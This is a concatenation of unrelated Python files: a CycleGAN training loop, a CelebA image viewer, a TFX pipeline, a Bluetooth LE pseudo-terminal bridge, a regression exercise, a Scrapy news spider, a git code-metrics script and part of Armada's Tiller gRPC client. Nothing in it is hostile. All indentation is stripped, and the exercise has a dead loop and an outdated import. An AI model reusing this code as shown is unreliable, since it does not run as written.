for a_real_ipt, b_real_ipt in matching_domain_sample_pairs:
a2b_opt, b2a_opt = sess.run([a2b, b2a], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt})
a2b_sample_ipt = np.array(a2b_pool(list(a2b_opt)))
b2a_sample_ipt = np.array(b2a_pool(list(b2a_opt)))
# train G
g_summary_opt, _ = sess.run([g_summary, g_train_op], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt})
summary_writer.add_summary(g_summary_opt, it)
# train D_b
d_summary_b_opt, _ = sess.run([d_summary_b, d_b_train_op], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt, a2b_sample: a2b_sample_ipt})
summary_writer.add_summary(d_summary_b_opt, it)
# train D_a
d_summary_a_opt, _ = sess.run([d_summary_a, d_a_train_op], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt, b2a_sample: b2a_sample_ipt})
summary_writer.add_summary(d_summary_a_opt, it)
epoch = it // batch_epoch
it_epoch = it % batch_epoch + 1
# display
print("Epoch: (%3d) (%5d/%5d) %s" % (epoch, it_epoch, batch_epoch, '(a->b->c)' if args.triplet else ''))
# Checkpointing
if do_save and (it + 1) % 10000 == 0:
save_path = saver.save(sess, '%s/Epoch_(%d)_(%dof%d)_step_(%d).ckpt' % (ckpt_dir, epoch, it_epoch, batch_epoch,it))
print('Model saved in file: % s' % save_path)
# Sample images for external evaluation (i.e. just raw single images). Note: For triplet=true, there are 2x steps involved.
if args.samplingcycle > 0 and (it % args.samplingcycle == 0) and it > 0:
print("Create samples for the external evaluator (aux batch {} with size {})".format(int(it/args.samplingcycle), args.online_sampling_batch_size))
for c_i in range(args.online_sampling_batch_size):
fname = 'Transformed_from_%s_(%dof%d)_once.png' % (args.stage2, c_i, args.singletestN)
save_single_img(a_real_ipt = b_test_pool.batch(), b_real_ipt = c_test_pool.batch(), save_dir = './aux_samples/' + args.dataset + subnet_ext_maybe+'/'+args.stage2+'/'+str(int(it)), fname=fname)
# Create sample images with a-b-a structure
if (it + 1) % 100 == 0:
a_real_ipt = b_test_pool.batch()
b_real_ipt = c_test_pool.batch()
[a2b_opt, a2b2a_opt, b2a_opt, b2a2b_opt] = sess.run([a2b, a2b2a, b2a, b2a2b], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt})
sample_opt = np.concatenate((a_real_ipt, a2b_opt, a2b2a_opt, b_real_ipt, b2a_opt, b2a2b_opt), axis=0)
im.imwrite(im.immerge(sample_opt, 2, 3), '%s/Epoch_(%d)_(%dof%d).png' % (online_samples_dir, epoch, it_epoch, batch_epoch))
if args.double_cycle:
[a2b_opt, a2b2a_opt, b2a_opt, b2a2b_opt] = sess.run([a2b, a2b2a, b2a, b2a2b], feed_dict={a_real: a2b_opt, b_real: b2a_opt})
sample_opt = np.concatenate((a_real_ipt, a2b_opt, a2b2a_opt, b_real_ipt, b2a_opt, b2a2b_opt), axis=0)
im.imwrite(im.immerge(sample_opt, 2, 3), '%s/Epoch_(%d)_(%dof%d)_double_cycle.png' % (online_samples_dir, epoch, it_epoch, batch_epoch))
if do_save and last_it != -1:
save_path = saver.save(sess, '%s/Epoch_(%d)_(%dof%d)_step_(%d).ckpt' % (ckpt_dir, epoch, it_epoch, batch_epoch,last_it))
print('Final model saved in file: % s' % save_path)
elif args.chaintestdir:
chaintests_N = 20
print("Run chain test on dir {} for {} times".format(args.chaintestdir, chaintests_N))
for c_i in range(chaintests_N):
a_real_ipt = b_test_pool.batch()
b_real_ipt = c_test_pool.batch()
[a2b_opt, a2b1_opt] = sess.run([a2b, a2b1], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt})
sample_opt = np.concatenate((a_real_ipt, a2b1_opt, a2b_opt), axis=0)
im.imwrite(im.immerge(sample_opt, 1, 3), '%s/Epoch_(%d)_(%dof%d)_once_and_twice.png' % (online_samples_dir, epoch, c_i, chaintests_N))
elif singleTestOnly:
print("Run single imgs test for {} times in direction {}".format(args.singletestN, "FORWARD" if args.singletest_forward==1 else "REVERSE"))
for c_i in range(args.singletestN):
fname = 'Transformed_from_%s_(%dof%d)_once.png' % (args.stage2, c_i, args.singletestN)
test_batch = single_test_input_pool.batch()
_save_dir = args.singletestdir_out if (not args.singletestdir_out == None) else online_samples_dir + '/s'
save_single_img(a_real_ipt = test_batch, b_real_ipt = test_batch, save_dir = _save_dir, fname=fname, forward_mapping = (args.singletest_forward == 1))
except Exception, e:
tf_coord.request_stop(e)
print(e)
finally:
print("Stop threads and close session!")
tf_coord.request_stop()
tf_coord.join(threads)
sess.close()
|
""" One by one show real images in the CelebA-HQ npy files' directory
Very useful for analyzing the data. press Q to move to the next image """
import argparse
import os
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
def parse_arguments():
"""
default command line argument parser
:return: args => parsed command line arguments
"""
parser = argparse.ArgumentParser()
parser.add_argument("--images_path", action="store", type=str,
help="path to the directory containing the images",
default="./", required=True)
parser.add_argument("--npz_files", action="store", type=bool,
default=True,
help="Whether it contains npz files or not", required=True)
args = parser.parse_args()
return args
def main(args):
"""
Main function for the script
:param args: parsed command line arguments
:return: None
"""
# go over the image files in the directory
for img_file_name in os.listdir(args.images_path):
img_file = os.path.join(args.images_path, img_file_name)
if args.npz_files:
img = np.load(img_file)
img = img.squeeze(0).transpose(1, 2, 0)
else:
img = np.array(Image.open(img_file))
# show the image on screen:
plt.figure().suptitle(img_file_name)
plt.imshow(img)
mng = plt.get_current_fig_manager()
mng.resize(*mng.window.maxsize())
plt.show()
if __name__ == '__main__':
main(parse_arguments())
|
"""
TFX Beam implementation to make a pipeline for solving santander problem.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import os
import tensorflow as tf
import tensorflow_model_analysis as tfma
from tfx.components import CsvExampleGen, StatisticsGen, SchemaGen, Trainer, ResolverNode, Evaluator, Pusher
from tfx.components.base import executor_spec
from tfx.components.trainer.executor import GenericExecutor
from tfx.proto import pusher_pb2
from tfx.proto import trainer_pb2
from tfx.utils.dsl_utils import external_input
from tfx.orchestration import pipeline
from tfx.orchestration import metadata
from tfx.orchestration.beam.beam_dag_runner import BeamDagRunner
from tfx.dsl.experimental import latest_blessed_model_resolver
from tfx.types import Channel
from tfx.types.standard_artifacts import Model
from tfx.types.standard_artifacts import ModelBlessing
FLAGS = flags.FLAGS
def generate_pipeline(pipeline_name, pipeline_root, data_root, train_steps, eval_steps, pusher_target):
examples = external_input(data_root)
example_gen = CsvExampleGen(input=examples)
statistics_gen = StatisticsGen(examples=example_gen.outputs['examples'])
schema_gen = SchemaGen(statistics=statistics_gen.outputs['statistics'],
infer_feature_shape=False)
trainer = Trainer(
custom_executor_spec=executor_spec.ExecutorClassSpec(GenericExecutor),
examples=example_gen.outputs['examples'],
schema=schema_gen.outputs['schema'],
module_file='util.py', # util.py is a file in the same folder
train_args=trainer_pb2.TrainArgs(num_steps=train_steps),
eval_args=trainer_pb2.EvalArgs(num_steps=eval_steps))
# Get the latest blessed model for model validation.
model_resolver = ResolverNode(
instance_name='latest_blessed_model_resolver',
resolver_class=latest_blessed_model_resolver.LatestBlessedModelResolver,
model=Channel(type=Model),
model_blessing=Channel(type=ModelBlessing))
# Uses TFMA to compute a evaluation statistics over features of a model and
# perform quality validation of a candidate model (compared to a baseline).
eval_config = tfma.EvalConfig(
model_specs=[tfma.ModelSpec(label_key='target')],
slicing_specs=[tfma.SlicingSpec()],
metrics_specs=[
tfma.MetricsSpec(
thresholds={
'binary_accuracy':
tfma.config.MetricThreshold(
value_threshold=tfma.GenericValueThreshold(
lower_bound={'value': 0.4})) # always bless
})
])
evaluator = Evaluator(
examples=example_gen.outputs['examples'],
model=trainer.outputs['model'],
# baseline_model=model_resolver.outputs['model'],
# Change threshold will be ignored if there is no baseline (first run).
eval_config=eval_config)
# Checks whether the model passed the validation steps and pushes the model
# to a file destination if check passed.
pusher = Pusher(
model=trainer.outputs['model'],
model_blessing=evaluator.outputs['blessing'],
push_destination=pusher_pb2.PushDestination(
filesystem=pusher_pb2.PushDestination.Filesystem(
base_directory=pusher_target)))
return pipeline.Pipeline(
pipeline_name=pipeline_name,
pipeline_root=pipeline_root,
components=[
example_gen, statistics_gen, schema_gen, trainer,
model_resolver, evaluator, pusher,
],
enable_cache=True,
metadata_connection_config=metadata.sqlite_metadata_connection_config(
os.path.join(pipeline_root, 'metadata.sqlite')))
def main(_):
pipeline = generate_pipeline(
flags.FLAGS.pipeline_name,
flags.FLAGS.pipeline_root,
flags.FLAGS.data_root,
flags.FLAGS.train_steps,
flags.FLAGS.eval_steps,
flags.FLAGS.pusher_target)
BeamDagRunner().run(pipeline)
if __name__ == '__main__':
flags.DEFINE_string(
name="pipeline_name", default="santander",
help="pipeline name used to identity different pipelines")
flags.DEFINE_string(
name="pipeline_root", default="/var/tmp/santander/keras/",
help="pipeline root for storing artifacts")
flags.DEFINE_string(
name="data_root", default="/var/tmp/santander/data/train",
help="Folder for Kaggle train.csv. No test.csv in the folder.")
flags.DEFINE_integer(
name="train_steps", default=10000,
help="Steps to train a model")
flags.DEFINE_integer(
name="eval_steps", default=1000,
help="Steps to train a model")
flags.DEFINE_string(
name="pusher_target", default="/var/tmp/santander/pusher",
help="Pusher can't create this folder for you")
app.run(main) |
#!/usr/bin/env python
"""
blepty.py connects to a JNHuaMao Bluetooth Low Energy module and
creates a pseudo-terminal (pty) that can be opened like a serial
port. The program writes the path to the terminal program and then
runs in the background, passing data between the BLE module and
the PTY.
This program must be run as root because it seems Python programs
cannot have capabilities assigned to them. If they could, then
sudo setcap 'cap_net_raw,cap_net_admin+eip' blepty.py
would allow this program to run without root privileges.
The work-around is to use cython to compile the program into a
standalone executable.
$ cython --embed blepty.py
$ make blepty CFLAGS="-I/usr/include/python2.7" LDFLAGS="-lpython2.7"
$ sudo setcap 'cap_net_raw,cap_net_admin+eip' blepty
Prerequisites:
1. A Bluetooth LE adapter on the host computer.
2. A Bluetooth LE device using a JNHuaMao BLE modules.
3. A supported OS on the host computer (Linux, OSX)
4. The necessary Python Bluetooth and GATT suport libraries.
"""
from __future__ import print_function
from bluetooth.ble import DiscoveryService
from bluetooth.ble import GATTRequester, GATTResponse
import argparse
import logging
import binascii
import sys
import os
import pty
import tty
import termios
import fcntl
import select
from time import sleep
from cStringIO import StringIO
BLETNC_SERVICE_UUID = '424a0001-90d6-4c48-b2aa-ab415169c333'
BLETNC_RX_CHAR_UUID = '424a0002-90d6-4c48-b2aa-ab415169c333'
BLETNC_TX_CHAR_UUID = '424a0003-90d6-4c48-b2aa-ab415169c333'
class NotifyTNC(GATTResponse):
"""
Notifications are received here and printed to STDOUT.
"""
def pty(self, fd):
self.fd = fd
def on_response(self, data):
print("NotifyTNC data: {}".format(binascii.hexlify(data)))
class TNCRequester(GATTRequester):
"""
The requester connected to the specific GATT characteristic.
"""
def __init__(self, address, fd):
self.fd = fd
GATTRequester.__init__(self, address, False)
self.response = NotifyTNC()
self.response.pty(fd)
self.connect(True, channel_type = 'random', security_level = 'medium')
self.handle = self.find_characteristic()
print("Reading from handle {}".format(self.handle))
self.read_by_handle_async(self.handle, self.response)
def find_characteristic(self):
# Find the UART characterstic and store its handle.
chars = self.discover_characteristics()
handle = [x['value_handle'] for x in chars
if x['uuid'] == BLETNC_RX_CHAR_UUID]
if len(handle) == 0:
raise RuntimeError("UART Characteristic not found.")
return handle[0]
def get_handle(self): return self.handle
def on_notification(self, handle, data):
print("TNCRequester data[{:2d}]: {}".format(len(data[3:]), binascii.hexlify(data[0:])))
os.write(self.fd, data[3:])
def __del__(self):
self.disconnect()
class Master(object):
def __init__(self, address):
# Open PTY
self.master, self.slave = pty.openpty()
# Start reqeuster
self.requester = TNCRequester(address, self.master)
self.handle = self.requester.get_handle()
# Configure slave PTY for Serial port emulation.
tty.setraw(self.slave)
attr = termios.tcgetattr(self.slave)
attr[3] = attr[3] & ~termios.ECHO
termios.tcsetattr(self.slave, termios.TCSADRAIN, attr)
# PTY eeds to be accessible if running as root.
os.fchmod(self.slave, 0666)
print("Listening on {}".format(os.ttyname(self.slave)))
def run(self):
"""Read from the master endpoint of the PTY. Use poll() to
wait for data. Data that is received is sent in no more
than 20-byte chunks. If less than 20 bytes are read, the
read times out after 10ms and sends the data that has
been read."""
# Set up the poll object.
flag = fcntl.fcntl(self.master, fcntl.F_GETFD)
fcntl.fcntl(self.master, fcntl.F_SETFD, flag | os.O_NONBLOCK)
p = select.poll()
p.register(self.master, select.POLLIN)
pos = 0
while True:
if pos == 0:
# Create a new buffer and wait for data. This can
# only wait a few seconds in order to check for
# BLE disconnection.
block = StringIO()
poll_results = p.poll(3000)
else:
# We read less than 20 bytes. Time out in 10ms to
# send a short packet.
poll_results = p.poll(10)
if len(poll_results) == 0:
# Poll timeout -- must be a short packet.
if not self.requester.is_connected():
print("Disconnected")
break
if pos == 0: continue # nothing to send
print("write[{:2d}]: {}".format(len(block.getvalue()),
binascii.hexlify(block.getvalue())))
self.requester.write_by_handle_async(self.handle,
str(bytearray(block.getvalue())),
self.requester.response)
pos = 0
else:
# Read one byte at a time. This is to ensure that
# we do not block in the read.
c = os.read(self.master, 1)
block.write(c)
pos += len(c)
if pos == 20:
print("write[{:2d}]: {}".format(len(block.getvalue()), binascii.hexlify(block.getvalue())))
self.requester.write_by_handle_async(self.handle, block.getvalue(), self.requester.response)
pos = 0
print("Done.")
sys.exit(0)
def parse_args():
parser = argparse.ArgumentParser(description='BLE UART server.')
parser.add_argument('-m', '--mac',
help='the MAC address of the Bluetooth LE device')
parser.add_argument('-n', '--name',
help='the name of the Bluetooth LE device')
parser.add_argument('-l', '--list', action='store_true',
help='list the discoverable Bluetooth LE devices')
return parser.parse_args()
def get_devices():
service = DiscoveryService('hci0')
return service.discover(2)
def list():
devices = get_devices()
print("Devices")
for address, name in devices.items():
print(" name: {}, address: {}".format(name, address))
try:
req = GATTRequester(address, False)
req.connect(True, channel_type = 'random', security_level = 'medium')
chars = req.discover_characteristics()
for char in chars:
print(char)
req.disconnect()
except RuntimeError, ex:
print(str(ex))
def get_device(name):
devices = get_devices()
matches = [(a, n) for a, n in devices.items() if n == name]
return matches
if __name__ == '__main__':
args = parse_args()
logging.basicConfig()
logging.getLogger('bluetooth').setLevel(logging.DEBUG)
if args.list is True:
list()
sys.exit(0)
if args.mac is None and args.name is not None:
dev = get_device(args.name)
if len(dev) == 0:
print(sys.stderr, "No matching devices found.")
sys.exit(1)
if len(dev) > 1:
print("Multiple matching devices found.")
sys.exit(1)
args.mac = dev[0][0]
if args.mac is not None:
master = Master(args.mac)
master.run()
|
# --------------
import pandas as pd
import numpy as np
from sklearn.cross_validation import train_test_split
# code starts here
df = pd.read_csv(path)
df.head(5)
# X = df[['ages', 'num_reviews', 'piece_count', 'play_star_rating', 'review_difficulty', 'star_rating', 'theme_name', 'val_star_rating', 'country']].shape[0]
# y = df[['list_price']].shape[0]
# print(X, y)
X = df.iloc[: , [0,2,3,4,5,6,7,8,9]]
y = df.iloc[:,1]
print(X)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 6)
# code ends here
# --------------
import matplotlib.pyplot as plt
# code starts here
cols =X_train.columns
fig ,axes = plt.subplots(3,3)
for i in range(0,3):
for j in range(3,0):
col = cols[ i * 3 + j]
plt.scatter(df['list_price'],df['ages'])
plt.scatter(df['list_price'],df['num_reviews'])
# code ends here
# --------------
# Code starts here
corr = X_train.corr()
print(corr)
X_train.drop(['play_star_rating' , 'val_star_rating'] ,axis = 1, inplace = True)
X_test.drop(['play_star_rating' , 'val_star_rating'] ,axis = 1, inplace = True)
# Code ends here
# --------------
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, r2_score
# Code starts here
regressor = LinearRegression()
regressor.fit(X_train, y_train)
y_pred = regressor.predict(X_test)
mse = mean_squared_error(y_pred,y_test)
r2 = r2_score(y_test,y_pred)
print(mse,r2)
# Code ends here
# --------------
# Code starts here
residual = (y_test - y_pred)
plt.hist(residual, bins = 20)
# a = y_test.shape
# b = y_pred.shape
# print(a,b)
# Code ends here
|
import scrapy
from ..items import NewsScrapeItem
import re
class NationSpider(scrapy.Spider):
name = "nation"
def start_requests(self):
urls = ['https://www.nationtv.tv/main/content/latest/']
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
all_div = response.css('.mb-4')
for i in all_div:
url = i.xpath("div/div/div/a/@href").extract_first()
yield scrapy.Request(url=url, callback=self.parse_news)
def parse_news(self, response):
items = NewsScrapeItem()
date = response.css('.article-date::text').extract_first()
head = response.css('.article-title::text').extract_first()
img = response.css('.article-feature-image img::attr(src)').extract_first()
cat = response.css('.breadcrumb-item:nth-child(3) a::text').extract_first()
body = ''
b = response.css('.article-body p::text').extract()
for i in b:
body=body+i+'\n'
items['body'] = body
items['date'] = date
items['head'] = head
items['img'] = img
items['category'] = cat
yield items
#%% |
#!/usr/bin/env python3.6
# example usage: ./2_1_per_module_metrics.py
import numpy as np
import os, json, time, re, subprocess
def is_cpp_file(file_name):
end = file_name.split(".")[-1]
return end in ["h", "cpp", "hpp", "c"]
def transform_file_paths(output, lookup):
transformed_files = []
for o in output:
if "#" not in o:
new_file = os.path.relpath(o)
if new_file in lookup:
transformed_files.append(new_file)
else:
transformed_files.append(o)
return transformed_files
file_metrics = {}
file_path_start = ""
for root, dirs, files in os.walk("."):
file_path_start = root[:2]
for name in files:
if is_cpp_file(name):
# we set default values for the 5 metrics
# MTBC : 365 => Biggest possible interval in our timeframe, since our observed time is one year
# NoC : 0 => No commits = No authors
# BF : 0 => 0 / 365 = 0
# OSpLoC : 0 => No object file => 0 Bytes / LoC = 0
# SoVkC : 0 => No symbols found that start with vk
file_metrics[os.path.relpath(os.path.join(root,name))] = [365, 0, 0, 0, 0]
# Mean Time Between Changes
# We assume a MTBC for Files with only one change during our timeframe from the date of the commit to the current date
# We also assume a MTBC for Files with no commits of our max interval of 1 year
history = subprocess.run(["git", "log", "--format=#%ct", "--name-only", "--since=1 year ago "], stdout=subprocess.PIPE)
history = history.stdout.decode('UTF8').split("\n")
output = list(filter(lambda x: is_cpp_file(x) or '#' in x, history))
output = transform_file_paths(output, file_metrics)
timestamp_dict ={}
current_time = 0
for line in output:
if line[0] == "#":
current_time = int(line[1:])
else:
timestamp_dict.setdefault(line, []).append(current_time)
for files, timestamps in timestamp_dict.items():
if len(timestamps) > 1:
differences = []
for t_index in range(len(timestamps) - 1):
diff = timestamps[t_index] - timestamps[t_index + 1]
differences.append(diff)
file_metrics[files][0] = int(np.mean(differences) / 60 / 60 / 24)
else:
# if file only was changed once we assume MTCB to be the difference between today and the one given date
file_metrics[files][0] = int((time.time() - timestamps[0]) / 60 / 60 / 24)
# NUMBER OF AUTHORS
history = subprocess.run(["git", "log", "--format=#%ae", "--name-only", "--since=1 year ago "], stdout=subprocess.PIPE)
history = history.stdout.decode('UTF8').split("\n")
output = list(filter(lambda x: is_cpp_file(x) or '#' in x, history))
output = transform_file_paths(output, file_metrics)
author_dict = {}
current_author = ''
for line in output:
if line[0] == "#":
current_author = line[1:]
else:
author_dict.setdefault(line, set()).add(current_author)
for file, authors in author_dict.items():
file_metrics[file][1] = len(authors)
# BOTCH FACTOR
for file, metrics in file_metrics.items():
noc = metrics[1]
mtbc = metrics[0]
if mtbc != 0:
file_metrics[file][2] = noc**2 / mtbc
#Object Size per LoC
with open('./compile_commands.json') as json_file:
file_mapping = json.load(json_file)
for compile_entry in file_mapping:
working_directory = compile_entry['directory']
source_file_name = compile_entry['file']
source_file_line_count = 0
with open(source_file_name) as source_file:
source_file_line_count = len(list(enumerate(source_file)))
object_file_name = compile_entry['command'].split('-o ')[1].split(' ')[0]
object_file_size = os.path.getsize(os.path.join(working_directory, object_file_name))
file_metrics[os.path.relpath(source_file_name)][3] = object_file_size / source_file_line_count
# Share of Vulkan Code
# only alpha numeric characters and underscore
pattern = re.compile('[\w_]+')
for file in file_metrics.keys():
with open(file, 'r', encoding='utf-8', errors='replace') as source_file:
# We assume that 'This check is case-insensitive and
# counts every occurrence of a symbol per source code file'
# means total number of symbols, not the total number of unique symbols
total_symbols = []
for line in source_file:
symbols = pattern.findall(line.lower())
total_symbols.extend(symbols)
vk_symbols = 0
for symbol in total_symbols:
if len(symbol) > 1 and symbol[:2] == 'vk':
vk_symbols += 1
if len(total_symbols) > 0:
file_metrics[file][4] = vk_symbols / len(total_symbols)
# Visualization
print('# filename;MTBC;NoC;BF;OSpLoC;SoVkC')
for filename, metrics in file_metrics.items():
m = [str(round(i,2)) for i in metrics]
print(filename + ';' + ";".join(m))
|
# Copyright 2017 The Armada Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import grpc
import yaml
from hapi.chart.config_pb2 import Config
from hapi.services.tiller_pb2 import GetReleaseContentRequest
from hapi.services.tiller_pb2 import GetReleaseStatusRequest
from hapi.services.tiller_pb2 import GetVersionRequest
from hapi.services.tiller_pb2 import InstallReleaseRequest
from hapi.services.tiller_pb2 import ListReleasesRequest
from hapi.services.tiller_pb2_grpc import ReleaseServiceStub
from hapi.services.tiller_pb2 import RollbackReleaseRequest
from hapi.services.tiller_pb2 import TestReleaseRequest
from hapi.services.tiller_pb2 import UninstallReleaseRequest
from hapi.services.tiller_pb2 import UpdateReleaseRequest
from oslo_config import cfg
from oslo_log import log as logging
from armada import const
from armada.exceptions import tiller_exceptions as ex
from armada.handlers.k8s import K8s
from armada.handlers import test
from armada.utils.release import label_selectors
TILLER_VERSION = b'2.10.0'
GRPC_EPSILON = 60
RELEASE_LIMIT = 128 # TODO(mark-burnett): There may be a better page size.
# the standard gRPC max message size is 4MB
# this expansion comes at a performance penalty
# but until proper paging is supported, we need
# to support a larger payload as the current
# limit is exhausted with just 10 releases
MAX_MESSAGE_LENGTH = 429496729
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class CommonEqualityMixin(object):
def __eq__(self, other):
return (isinstance(other, self.__class__) and
self.__dict__ == other.__dict__)
def __ne__(self, other):
return not self.__eq__(other)
class TillerResult(CommonEqualityMixin):
'''Object to hold Tiller results for Armada.'''
def __init__(self, release, namespace, status, description, version):
self.release = release
self.namespace = namespace
self.status = status
self.description = description
self.version = version
class Tiller(object):
'''
The Tiller class supports communication and requests to the Tiller Helm
service over gRPC
'''
def __init__(self,
tiller_host=None,
tiller_port=None,
tiller_namespace=None,
dry_run=False):
self.tiller_host = tiller_host
self.tiller_port = tiller_port or CONF.tiller_port
self.tiller_namespace = tiller_namespace or CONF.tiller_namespace
self.dry_run = dry_run
# init k8s connectivity
self.k8s = K8s()
# init Tiller channel
self.channel = self.get_channel()
# init timeout for all requests
# and assume eventually this will
# be fed at runtime as an override
self.timeout = const.DEFAULT_TILLER_TIMEOUT
LOG.debug('Armada is using Tiller at: %s:%s, namespace=%s, timeout=%s',
self.tiller_host, self.tiller_port, self.tiller_namespace,
self.timeout)
@property
def metadata(self):
'''
Return Tiller metadata for requests
'''
return [(b'x-helm-api-client', TILLER_VERSION)]
def get_channel(self):
'''
Return a Tiller channel
'''
tiller_ip = self._get_tiller_ip()
tiller_port = self._get_tiller_port()
try:
LOG.debug(
'Tiller getting gRPC insecure channel at %s:%s '
'with options: [grpc.max_send_message_length=%s, '
'grpc.max_receive_message_length=%s]', tiller_ip, tiller_port,
MAX_MESSAGE_LENGTH, MAX_MESSAGE_LENGTH)
return grpc.insecure_channel(
'%s:%s' % (tiller_ip, tiller_port),
options=[('grpc.max_send_message_length', MAX_MESSAGE_LENGTH),
('grpc.max_receive_message_length',
MAX_MESSAGE_LENGTH)])
except Exception:
raise ex.ChannelException()
def _get_tiller_pod(self):
'''
Returns Tiller pod using the Tiller pod labels specified in the Armada
config
'''
pods = None
namespace = self._get_tiller_namespace()
pods = self.k8s.get_namespace_pod(namespace,
CONF.tiller_pod_labels).items
# No Tiller pods found
if not pods:
raise ex.TillerPodNotFoundException(CONF.tiller_pod_labels)
# Return first Tiller pod in running state
for pod in pods:
if pod.status.phase == 'Running':
LOG.debug('Found at least one Running Tiller pod.')
return pod
# No Tiller pod found in running state
raise ex.TillerPodNotRunningException()
def _get_tiller_ip(self):
'''
Returns the Tiller pod's IP address by searching all namespaces
'''
if self.tiller_host:
LOG.debug('Using Tiller host IP: %s', self.tiller_host)
return self.tiller_host
else:
pod = self._get_tiller_pod()
LOG.debug('Using Tiller pod IP: %s', pod.status.pod_ip)
return pod.status.pod_ip
def _get_tiller_port(self):
'''Stub method to support arbitrary ports in the future'''
LOG.debug('Using Tiller host port: %s', self.tiller_port)
return self.tiller_port
def _get_tiller_namespace(self):
LOG.debug('Using Tiller namespace: %s', self.tiller_namespace)
return self.tiller_namespace
def tiller_status(self):
'''
return if Tiller exist or not
'''
if self._get_tiller_ip():
LOG.debug('Getting Tiller Status: Tiller exists')
return True
LOG.debug('Getting Tiller Status: Tiller does not exist')
return False
def list_releases(self):
'''
List Helm Releases
'''
# TODO(MarshM possibly combine list_releases() with list_charts()
# since they do the same thing, grouping output differently
releases = []
stub = ReleaseServiceStub(self.channel)
# TODO(mark-burnett): Since we're limiting page size, we need to
# iterate through all the pages when collecting this list.
# NOTE(MarshM): `Helm List` defaults to returning Deployed and Failed,
# but this might not be a desireable ListReleasesRequest default.
req = ListReleasesRequest(
limit=RELEASE_LIMIT,
status_codes=[const.STATUS_DEPLOYED, const.STATUS_FAILED],
sort_by='LAST_RELEASED',
sort_order='DESC')
LOG.debug('Tiller ListReleases() with timeout=%s', self.timeout)
release_list = stub.ListReleases(
req, self.timeout, metadata=self.metadata)
for y in release_list:
# TODO(MarshM) this log is too noisy, fix later
# LOG.debug('Found release: %s', y.releases
releases.extend(y.releases)
return releases
def get_chart_templates(self, template_name, name, release_name, namespace,
chart, disable_hooks, values):
# returns some info
LOG.info("Template( %s ) : %s ", template_name, name)
stub = ReleaseServiceStub(self.channel)
release_request = InstallReleaseRequest(
chart=chart,
dry_run=True,
values=values,
name=name,
namespace=namespace,
wait=False)
templates = stub.InstallRelease(
release_request, self.timeout, metadata=self.metadata)
for template in yaml.load_all(
getattr(templates.release, 'manifest', [])):
if template_name == template.get('metadata', None).get(
'name', None):
LOG.info(template_name)
return template
def _pre_update_actions(self, actions, release_name, namespace, chart,
disable_hooks, values, timeout):
'''
:param actions: array of items actions
:param namespace: name of pod for actions
'''
try:
for action in actions.get('update', []):
name = action.get('name')
LOG.info('Updating %s ', name)
action_type = action.get('type')
labels = action.get('labels')
self.rolling_upgrade_pod_deployment(
name, release_name, namespace, labels, action_type, chart,
disable_hooks, values, timeout)
except Exception:
LOG.warn("Pre: Could not update anything, please check yaml")
raise ex.PreUpdateJobDeleteException(name, namespace)
try:
for action in actions.get('delete', []):
name = action.get('name')
action_type = action.get('type')
labels = action.get('labels', None)
self.delete_resources(
release_name,
name,
action_type,
labels,
namespace,
timeout=timeout)
except Exception:
LOG.warn("PRE: Could not delete anything, please check yaml")
raise ex.PreUpdateJobDeleteException(name, namespace)
def list_charts(self):
'''
List Helm Charts from Latest Releases
Returns a list of tuples in the form:
(name, version, chart, values, status)
'''
LOG.debug('Getting known releases from Tiller...')
charts = []
for latest_release in self.list_releases():
try:
release = (latest_release.name, latest_release.version,
latest_release.chart, latest_release.config.raw,
latest_release.info.status.Code.Name(
latest_release.info.status.code))
charts.append(release)
LOG.debug('Found release %s, version %s, status: %s',
release[0], release[1], release[4])
except (AttributeError, IndexError) as e:
LOG.debug('%s while getting releases: %s, ex=%s',
e.__class__.__name__, latest_release, e)
continue
return charts
def update_release(self,
chart,
release,
namespace,
pre_actions=None,
post_actions=None,
disable_hooks=False,
values=None,
wait=False,
timeout=None,
force=False,
recreate_pods=False):
'''
Update a Helm Release
'''
timeout = self._check_timeout(wait, timeout)
LOG.info(
'Helm update release%s: wait=%s, timeout=%s, force=%s, '
'recreate_pods=%s', (' (dry run)' if self.dry_run else ''), wait,
timeout, force, recreate_pods)
if values is None:
values = Config(raw='')
else:
values = Config(raw=values)
self._pre_update_actions(pre_actions, release, namespace, chart,
disable_hooks, values, timeout)
update_msg = None
# build release install request
try:
stub = ReleaseServiceStub(self.channel)
release_request = UpdateReleaseRequest(
chart=chart,
dry_run=self.dry_run,
disable_hooks=disable_hooks,
values=values,
name=release,
wait=wait,
timeout=timeout,
force=force,
recreate=recreate_pods)
update_msg = stub.UpdateRelease(
release_request,
timeout + GRPC_EPSILON,
metadata=self.metadata)
except Exception:
LOG.exception('Error while updating release %s', release)
status = self.get_release_status(release)
raise ex.ReleaseException(release, status, 'Upgrade')
tiller_result = TillerResult(
update_msg.release.name, update_msg.release.namespace,
update_msg.release.info.status.Code.Name(
update_msg.release.info.status.code),
update_msg.release.info.Description, update_msg.release.version)
return tiller_result
def install_release(self,
chart,
release,
namespace,
values=None,
wait=False,
timeout=None):
'''
Create a Helm Release
'''
timeout = self._check_timeout(wait, timeout)
LOG.info('Helm install release%s: wait=%s, timeout=%s',
(' (dry run)' if self.dry_run else ''), wait, timeout)
if values is None:
values = Config(raw='')
else:
values = Config(raw=values)
# build release install request
try:
stub = ReleaseServiceStub(self.channel)
release_request = InstallReleaseRequest(
chart=chart,
dry_run=self.dry_run,
values=values,
name=release,
namespace=namespace,
wait=wait,
timeout=timeout)
install_msg = stub.InstallRelease(
release_request,
timeout + GRPC_EPSILON,
metadata=self.metadata)
tiller_result = TillerResult(
install_msg.release.name, install_msg.release.namespace,
install_msg.release.info.status.Code.Name(
install_msg.release.info.status.code),
